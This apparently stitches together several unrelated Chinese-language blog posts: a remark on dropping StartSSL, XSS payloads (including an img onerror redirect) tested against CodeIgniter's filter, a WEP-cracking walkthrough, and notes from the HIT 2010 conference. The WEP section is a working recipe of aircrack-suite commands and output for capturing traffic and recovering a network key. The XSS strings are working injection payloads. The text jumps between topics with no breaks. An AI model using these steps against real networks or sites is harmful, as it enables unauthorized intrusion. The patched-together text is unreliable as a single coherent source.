Why I stopped using StartSSL (Hint: it involves a Chinese company)
https://pierrekim.github.io/blog/2016-02-16-why-i-stopped-using-startssl-because-of-qihoo-360.html
由於 cert 被扔到大陸機房去,所以還是換家 SSL provider 比較安全一點。
噗浪上有不少朋友提供 Let’s Encrypt 的解決方案,除了「root can only help」以外,好像沒什麼奇怪的地方。另外 JoeHorn 寫了一個全自動 renew 的 script,假日的時候來玩玩看 ~
比較常見的 XSS 多安插 javascript 程式在 HTML 元素中:
<img src="javascript:alert('XSS')">最近發現有趣的攻擊方式:
<img/src=x oooooo/oooooooooo/onerror="top.location='http://zeroplex.blogspot.com'" >這對程式碼本身並不具危險性,但瀏覽器開啟上面那一段 HTML 時,卻會自動重新導向到 zeroplex.blogspot.com。
主要原因是,瀏覽器都有提供語法自動補齊、修正功能。眼尖的人應該會發現,上面那一段語法,使用 Chrome 的開發者工具 (非檢視原始碼) 開啟時,會被自動修成 (top.location 改掉以便 debug):
恐怖的是,瀏覽器將最後面的語法修道可以執行,因此 %lt;img src=”x”> 時,瀏覽器無法擷取圖片,造成 error,而觸發了後半部 onError 事件,執行 top.localtion=”http://zeroplex.blogspot.com” 而跳到我的部落格頁面
過去防止 XSS 攻擊都是透過 htmlspecialchars() 將「<」、「>」等符號編碼,但若是前端有使用 CKEditor 之類工具,文章中的樣式也會全部被洗掉。
最近用 CodeIgniter Input class 提供的 XSS filter 時,無意間發現 filter 不是將所有特殊符號過濾掉,而是經過 parser 以後才決定哪些標籤和屬性需要刪除。
一般常見用來測試 XSS 的字串:
<script>alert(123)</script>輸出:
[removed]alert(123)[removed]若是將 javascript 嵌在屬性當中,CodeIgniter 會將標籤留下、屬性刪除:
<a href="#" onclick="alert(123)">test</a>輸出:
<a >test</a>查詢 AP 資訊,找出目標 SSID 和 channel:
$ sudo iwlist wlan0 scanning
Cell 01 - Address: 00:14:6C:7E:40:80
Channel:11
Frequency:2.462 GHz (Channel 11)
Quality=39/70 Signal level=-71 dBm
Encryption key:on
ESSID:"Zeroplex"
用 airmon-ng 進入監聽模式,注意最後一個參數是目標 AP 所用的 channel:
$ sudo airmon-ng start wlan0 11
Interface Chipset Driver
wlan0 RTL8187 rtl8187 - [phy2]
(monitor mode enabled on mon0)
訊息後方有顯示模擬來監聽的網卡,之後 aireplay-ng 和 airodump-ng 會用這個 device。先用 aireplay-ng 檢查與目標 AP 的通訊狀況,參數「-9」表示做 injection test:
$ sudo aireplay-ng -9 -e Zeroplex mon0
21:39:04 Waiting for beacon frame (ESSID: Zeroplex) on channel 11
Found BSSID "00:14:6C:7E:40:80" to given ESSID "Zeroplex".
21:39:04 Trying broadcast probe requests...
21:39:04 Injection is working!
21:39:06 Found 1 AP
21:39:06 Trying directed probe requests...
21:39:06 00:14:6C:7E:40:80 - channel: 11 - 'Zeroplex'
21:39:06 Ping (min/avg/max): 0.604ms/10.323ms/37.851ms Power: -14.86
21:39:06 29/30: 96%最後一行的百分比表示訊號概況,數值越高表示成功率越高,距離 AP 太遠或是太近都會有影響。
準備好後就可以開始用 airodump-ng 監聽。參數「-i」表示只記錄對破解有用的資訊,沒有家䢢這個參數時,airodump-ng 會記錄所有封包內容,若有人在抓 BT 小心硬碟被吃光光;參數「-w」後加上記錄檔名稱;「–bssid」為目標 AP 的 MAC address、「-c」是channel,若沒有指定特定目標,airodump-ng 會記錄所有接收到的資訊。
$ sudo airodump-ng --bssid 00:14:6C:7E:40:80 -c 11 -i -w data mon0
CH 11 ][ Elapsed: 0 s ][ 2012-01-07 21:48
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 -20 0 9 1 0 11 54e. WEP WEP Zeroplex
Beacons 與 Data 數量越多對破解越有利。
最後使用 aircrack 嘗試解開密碼:
$ aircrack-ng record-01.cap -l key.txt
解密碼會花上一段時間,若有成功解開密碼,會將密碼寫進 key.txt 裡;若資訊量不足以解開密碼,請繼續監聽,直到 IVs 達到門檻值後再嘗試。
aircrack 的 tutorial 裡面還有介紹 aireplay-ng 的其他玩法,有興趣的可以試試看。
Tutorial: Simple WEP Crack
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
上一次參加資安類型的研討會是在 SA @ Tainan 由 CIH 主講,不過駭客年會得規模實在大非常多。
很慶幸這次參加 HIT 2010,雖然議程幾乎都聽不懂,不過認識了很多人,還遇到了五年沒碰面的高中同學,其中一個還在今天 Wargame 冠軍的交大 DSNS 實驗室。
今年的梗不少,筆記一下:
最後感謝會場工作人員和與會者讓我有這麼「駭人」的經驗,也要感謝澔哥、小佳、洪爺 (此洪爺非彼洪爺)、CYJ 和 SA @ Taipei 願意與我共進晚餐。